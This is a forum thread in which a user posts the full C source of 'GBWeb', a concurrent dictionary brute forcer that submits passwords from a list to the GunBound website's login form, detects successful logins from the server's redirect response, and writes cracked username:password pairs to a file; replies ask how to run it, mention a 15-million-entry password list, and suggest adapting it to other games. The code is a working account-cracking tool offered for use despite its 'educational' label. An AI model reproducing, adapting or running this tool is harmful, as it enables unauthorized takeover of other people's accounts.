Complex C++ script

[gundrake]

This is a gunbound account brute forcer ment to be run with cygwin. I forgot the basic commands to make it run but you guys can take a look at it . Maybe tell us how to activate it again and see if you can edit it to work for other games.

Code:

/*
  GBWeb by volz0r
  GunBound web-based password brute forcer

  *** FOR EDUCATIONAL PURPOSES ONLY ***

  Uses concurrent connections, to test a list of passwords
  against a username via the login page on gunbound.net.
*/

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <unistd.h>
#include <fcntl.h>
#include <netdb.h>
#include <errno.h>

#define BAR_SIZE 50

#define G_S_NONE   0
#define G_S_CONN   1 /* Connecting           */
#define G_S_ISCONN 2 /* Connected            */
#define G_S_SENT   3 /* Sent data            */
#define G_S_DONE   4 /* Done                 */

/*
  Authentication structure
*/
typedef struct __gb_ {
 int s,
     status;
 char buf[20],
      *password;
} gb_t;

static int bar_cnt = 0;
static gb_t **gbs = NULL;
static struct sockaddr_in in_addr;
static char *username = NULL;
static FILE *stream = NULL, *ofs = NULL;

static void banner(void);
static int resolve(void);
static void search(void);
static int gbs_conn(gb_t *);
static int gbs_write(gb_t *);
static int gbs_next_password(gb_t *);
static int gbs_read(gb_t *);
static int gbs_save(gb_t *);
static void bar_update(char);

int main(int argc, char *argv[])
{
 int ret = 0, i = 0;

 banner();

 if (argc < 4) {
    printf("Usage: %s <connections> <username> <passwordlist>\n", argv[0]);
    return 1;
 }

 bar_cnt = 0;
 username = argv[2];

 ret = atoi(argv[1]);
 if (ret < 1) {
    printf("Invalid connection count\n");
    return 1;
 }

 stream = fopen(argv[3], "r");
 if (stream == NULL) {
    perror(argv[3]);
    return 1;
 }

 ofs = fopen("./hits.txt", "a");
 if (ofs == NULL) {
    perror("hits.txt");
    fclose(stream);
    return 1;
 }

 gbs = (gb_t **)malloc(sizeof(gb_t *) * (ret + 1));
 if (gbs == NULL) {
    printf("Out of memory\n");
    return 1;
 }

 for (i = 0; i < ret; i++) {
     gbs[i] = (gb_t *)malloc(sizeof(gb_t));
     if (gbs[i] == NULL) {
        printf("Out of memory\n");
        return 1;
     }

     memset(gbs[i], 0, sizeof(gb_t));
 }

 gbs[i] = NULL;

 ret = resolve();
 if (!ret) {
    printf("Couldn't resolve gunbound.net\n");
    return 1;
 }

 search();

 return 0;
}

/*
  Shameless plug
*/
void banner(void)
{
 printf("+--------------------------------------------------------+\n" \
        "|                    GBWeb by volz0r                     |\n" \
        "+--------------------------------------------------------+\n" \
        "\n");
}

/*
  Resolve gunbound.net
*/
int resolve(void)
{
 struct hostent *he = NULL;

 he = gethostbyname("gunbound.net");
 if (he == NULL)
    return 0;

 memcpy(&in_addr.sin_addr.s_addr, he->h_addr_list[0], he->h_length);

 return 1;
}

/*
  Handle the concurrent connections
*/
void search(void)
{
 fd_set rfds, wfds;
 struct timeval tv;
 int ret = 0, i = 0, wnum = 0, rnum = 0, max_fd = 0, dnum = 0;

#ifndef DEBUG
 putchar('[');
 for (i = 0; i < BAR_SIZE; i++)
     putchar('.');
 printf("]\r[");
 fflush(stdout);
#endif

 while(1) {
   tv.tv_sec = 5;
   tv.tv_usec = 0;

   FD_ZERO(&rfds);
   FD_ZERO(&wfds);

   rnum = wnum = dnum = 0;

   for (i = 0; gbs[i]; i++) {
       if (gbs[i]->status == G_S_DONE) {
          dnum++;
          continue;
       }

       if (gbs[i]->status == G_S_NONE) {
          ret = gbs_conn(gbs[i]);

#ifdef DEBUG
          if (ret == -1)
             printf("%d: Connect: %d\n", i, ret);
          else if (ret == 0)
             printf("%d: Connecting\n", i);
          else
             printf("%d: Connected\n", i);
#endif
       }

       else if (gbs[i]->status == G_S_CONN) {
          FD_SET(gbs[i]->s, &wfds);

          if (gbs[i]->s >= max_fd)
             max_fd = (gbs[i]->s + 1);

          wnum++;
       }

       else if (gbs[i]->status == G_S_ISCONN) {
          FD_SET(gbs[i]->s, &wfds);

          if (gbs[i]->s >= max_fd)
             max_fd = (gbs[i]->s + 1);
 
          wnum++;
       }

       else if (gbs[i]->status == G_S_SENT) {
          FD_SET(gbs[i]->s, &rfds);

          if (gbs[i]->s >= max_fd)
             max_fd = (gbs[i]->s + 1);

          rnum++;
       }
   }

   if (dnum == i)
      break;

   if ((rnum == 0) && (wnum == 0))
      continue;
   
   ret = select(max_fd, rnum ? &rfds : NULL, wnum ? &wfds : NULL, NULL, &tv);
   if (ret == -1) {
      perror("select");
      break;
   }

   if (ret == 0)
      continue;

   for (i = 0; gbs[i]; i++) {
       if (gbs[i]->status == G_S_CONN) {
          if (FD_ISSET(gbs[i]->s, &wfds)) {
             gbs[i]->status = G_S_ISCONN;
#ifdef DEBUG
             printf("%d: Connected\n", i);
#endif
          }
       }

       else if (gbs[i]->status == G_S_ISCONN) {
          if (FD_ISSET(gbs[i]->s, &wfds)) {
             ret = gbs_write(gbs[i]);

#ifdef DEBUG
             if (ret == -1)
                printf("%d: Write: failed\n", i);
             else if (ret == 0)
                printf("%d: Done\n", i);
             else if (ret == 1)
                printf("%d: Wrote\n", i);
#else
             if (ret == -1)
                bar_update('-');
#endif
          }
       }

       else if (gbs[i]->status == G_S_SENT) {
          if (FD_ISSET(gbs[i]->s, &rfds)) {
             ret = gbs_read(gbs[i]);
#ifdef DEBUG
             if (ret == -1)
                printf("%d: Read: failed\n", i);
             else if (ret == 0)
                printf("%d: Invalid password\n", i);
             if (ret == 1)
                printf("%d: Found password\n", i);
      else if (ret == 2)
                printf("%d: Unexpected response\n", i);
#else
      if (ret == -1)
                bar_update('-');
             else if (ret == 0)
                bar_update('o');
             else if (ret == 1)
                bar_update('!');
#endif
             if (ret != -1)
                gbs[i]->password = NULL;
          }
       }
   }
 }
}

/*
  Connect to gunbound.net
*/
int gbs_conn(gb_t *g)
{
 struct sockaddr_in addr;
 int s = 0, ret = 0, fl = 0;

 addr.sin_family = AF_INET;
 addr.sin_port   = htons(80);
 addr.sin_addr.s_addr = in_addr.sin_addr.s_addr;

 s = socket(AF_INET, SOCK_STREAM, 0);
 if (s == -1)
    return -1;

 fl = fcntl(s, F_GETFL);
 if (fl == -1) {
    close(s);
    return -1;
 }

 fl |= O_NONBLOCK;

 ret = fcntl(s, F_SETFL, &fl);
 if (ret == -1) {
    close(s);
    return -1;
 }

 ret = connect(s, (struct sockaddr *)&addr, sizeof(addr));
 if ((ret == -1) && (errno != EINPROGRESS)) {
    close(s);
    return -1;
 }

 g->s = s;
 g->password = NULL;

 if (ret == -1) {
    g->status = G_S_CONN;
    return 0;
 }

 g->status = G_S_ISCONN;
 return 1;
}

/*
  Write FORM data
*/
int gbs_write(gb_t *g)
{
 size_t ret = 0, len = 0, lblen = 0;
 char buf[200] = { 0 }, lb[50] = { 0 };
 static char hdrs[] =
   "POST /member/Gunbound_Id_Check.asp HTTP/1.1\r\n" \
   "Host: gunbound.net\r\n" \
   "User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.4) Gecko/20030624 Netscape/7.1\r\n" \
   "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,*/*;q=0.1\r\n" \
   "Accept-Language: en-us,en;q=0.5\r\n" \
   "Accept-Encoding: gzip,deflate\r\n" \
   "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n" \
   "Keep-Alive: 300\r\n" \
   "Connection: keep-alive\r\n" \
   "Referer: http://gunbound.net/member/find_ID_for.asp\r\n" \
   "Content-Type: application/x-www-form-urlencoded\r\n";

 if (g->password == NULL) {
    ret = gbs_next_password(g);
    if (ret == 0) {
       g->status = G_S_DONE;
       return 0;
    }
 }

 memset(buf, 0, sizeof(buf));
 len = snprintf(buf, sizeof(buf) - 1, "Gunbound_Id=%s&Gunbound_Password=%s&x=39&y=13",
username, g->password);

 memset(lb, 0, sizeof(lb));
 lblen = snprintf(lb, sizeof(lb) - 1, "Content-Length: %d\r\n\r\n", len);

#ifdef DEBUG_MORE
 printf("Wrote:\n");
#endif

 ret = write(g->s, hdrs, sizeof(hdrs) - 1);
 if (ret != sizeof(hdrs) - 1)
    return -1;

#ifdef DEBUG_MORE
 printf("%s", hdrs);
#endif

 ret = write(g->s, lb, lblen);
 if (ret != lblen)
    return -1;

#ifdef DEBUG_MORE
 printf("%s", lb);
#endif

 ret = write(g->s, buf, len);
 if (ret != len)
    return -1;

#ifdef DEBUG_MORE
 printf("%s", buf);
 fflush(stdout);
#endif

 g->status = G_S_SENT;
 
 return 1;
}

/*
  Fetch the next password
*/
int gbs_next_password(gb_t *g)
{
 char *p = NULL;

 g->password = NULL;

 if (feof(stream))
    return 0;

 memset(g->buf, 0, 20);
 fgets(g->buf, 20, stream);

 if (feof(stream))
    return 0;

 for (p = g->buf; *p; p++) {
     if ((*p == '\r') || (*p == '\n')) {
        *p = '\0';
        break;
     }
 }

 g->password = g->buf;

#ifdef DEBUG
 printf("Trying %s:%s\n", username, g->password);
#endif

 return 1;
}

/*
  Read response from server,
  determine if it's a valid password or not
*/
int gbs_read(gb_t *g)
{
 int r = 0;
 size_t ret = 0;
 char buf[500] = { 0 };

 memset(buf, 0, sizeof(buf));

 ret = read(g->s, buf, sizeof(buf));
 if (ret < 1)
    return -1;

 if (!(strncasecmp(buf, "HTTP/1.1 200 OK", 15)))
    r = 0;
 else if (!(strncasecmp(buf, "HTTP/1.1 302 Object moved", 25)))
    r = 1;
 else
    r = 2;

#ifdef DEBUG_MORE
 printf("Read: [%s]\n", buf);
#endif

 if (r == 1) {    
    ret = gbs_save(g);
#ifdef DEBUG
    printf("gbs_save: %d\n", ret);
#endif
 }

 close(g->s);
 g->s = -1;
 g->status = G_S_NONE;

 return r;
}

/*
  Save found username:password
*/
int gbs_save(gb_t *g)
{
 if (g->password == NULL)
    return 0;

 if (!(*(g->password)))
    return -2;

 if (ofs == NULL)
    return -3;

#ifdef DEBUG
 printf("Saved %s:%s\n", username, g->password);
#endif

 fprintf(ofs, "%s:%s\n", username, g->password);
 fflush(ofs);

 return 1;
}

/*
  Update visual progress bar
*/
void bar_update(char c)
{
 int i = 0;

 if (bar_cnt == BAR_SIZE) {
    printf("\r[");
    for (i = 0; i < BAR_SIZE; i++)
        putchar('.');
    printf("\r[");
    bar_cnt = 0;
 }

 putchar(c);
 bar_cnt++;
 fflush(stdout);
}

[HYPD]

Whoa definatley don't know much about this..

[Gus_7]

I'm taking some classes right now in college but i'm not near this lvl yet   lol just doing basic stuff and how to get a mouse out of a maze, it's suppose to get intense next semester.

[Recoil]

barely any comments.... other than credits, i guess ill give it a try

[gundrake]

lol

[gundrake]

Looks like its too hard =>

[Recoil]

uhh ye, it wont compile for me, i think there are missing libraries that are needed...

[defenXOR]

if i'm not mistaken, it's a primitive account cracker.

it accepts a file list of possible passwords as one of the command line argument and tries all the entries one by one.

you can setup a password list containing as much dictionary words as you can include and the prog will check them out.

crude but might work against users who do not know how to select a secure set of passwords.

[gundrake]

lmao the txt file with passwords has like 15 million assorted passwords

[GAMEfreak]

omg wots the size of the file? 50mb  /heh

[sykescone2]

fatal error C1083: Cannot open include file: 'sys/socket.h': No such file or directory

umh do i need to DL this headerfile:<sys/socket.h>? /hmm


EDIT: im sorry but i think i installed an old visual C++ its version 6.0..

[gundrake]

people people..... dont compile it.. find the commands to make "IT" work I have a compiled version already I just dont know its commands.

[wilen]

nice job but not for Gunbound Philippines   guys i think you can use wwwhack

this is for Gunbound Philippines only

/help

[genesis234]

No. Can be used at an server as long as you know how to modify it.